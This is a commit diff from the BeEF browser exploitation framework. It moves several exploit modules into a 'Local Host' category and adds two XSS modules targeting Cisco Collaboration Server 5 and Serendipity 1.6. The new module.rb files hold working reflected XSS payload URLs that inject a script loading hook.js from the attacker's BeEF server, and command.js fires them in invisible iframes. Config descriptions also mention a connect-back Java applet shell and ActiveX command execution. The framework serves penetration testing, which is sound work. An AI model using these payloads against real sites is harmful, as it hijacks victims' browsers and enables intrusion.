Moved a few modules from modules/exploits/ to modules/exploits/local_host:

activex_command_execution
	mozilla_nsiprocess_interface
	window_mail_client_dos
	java_payload
	safari_launch_app

Added a couple of XSS modules:
	cisco_collaboration_server_5_xss
	serendipity_1.6_xss

modules/exploits/local_host/activex_command_execution/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         activex_command_execution:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "ActiveX Command Execution"
             description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.<br><br>The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled."
             authors: ["bcoles"]

modules/exploits/local_host/java_payload/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         java_payload:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Java Payload"
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
             authors: ["antisnatchor"]

modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         mozilla_nsiprocess_interface:
             enable: false
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Mozilla nsIProcess XPCOM Interface (Windows)"
             description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe<br /><br />Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine."
             authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"]

modules/exploits/local_host/safari_launch_app/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         safari_launch_app:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Safari Launch App"
             description: "Launch an application from the victim machine.<br/><br/>See CVE-2011-3230 for more details.<br /><br />Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel."
             authors: ["antisnatchor"]

modules/exploits/local_host/window_mail_client_dos/config.yaml

@@ -17,7 +17,7 @@ beef:
     module:
         windows_mail_client_dos:
             enable: true
-            category: "Exploits"
+            category: ["Exploits", "Local Host"]
             name: "Windows Mail Client DoS"
             description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.<br /><br />Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).<br /><br />The protocol handler used will be: nntp."
             authors: ["bcoles"]

modules/exploits/xss/cisco_collaboration_server_5_xss/command.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var cisco_collaboration_iframe = beef.dom.createInvisibleIframe();
+	cisco_collaboration_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        cisco_collaboration_server_5_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Cisco Collaboration Server 5 XSS"
+            description: "Attempts to hook Cisco Collaboration Server 5 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/11403/"
+            authors: ["bcoles", "s4squatch"]
+            target:
+                working: ["ALL"]

modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Cisco_collaboration_server_5_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest="><script src="'+hook_uri+'"></script>'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

modules/exploits/xss/serendipity_1.6_xss/command.js

@@ -0,0 +1,26 @@
+//
+//   Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+
+	var uri = '<%= @uri.gsub(/'/, "\\'") %>'; 
+
+	var serendipity_iframe = beef.dom.createInvisibleIframe();
+	serendipity_iframe.setAttribute('src', uri);
+
+	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+});
+

modules/exploits/xss/serendipity_1.6_xss/config.yaml

@@ -0,0 +1,25 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        serendipity_1_6_xss:
+            enable: true
+            category: ["Exploits", "XSS"]
+            name: "Serendipity <= 1.6 XSS"
+            description: "Attempts to hook Serendipity <= 1.6 using XSS.<br/>For more information see: http://www.exploit-db.com/exploits/18884/"
+            authors: ["bcoles", "Stefan Schurtz"]
+            target:
+                working: ["ALL"]

modules/exploits/xss/serendipity_1.6_xss/module.rb

@@ -0,0 +1,33 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Serendipity_1_6_xss < BeEF::Core::Command
+
+	def self.options
+
+		configuration = BeEF::Core::Configuration.instance
+		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js"
+
+		return [
+			{'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"</script><script src="'+hook_uri+'"></script>'}
+		]
+
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end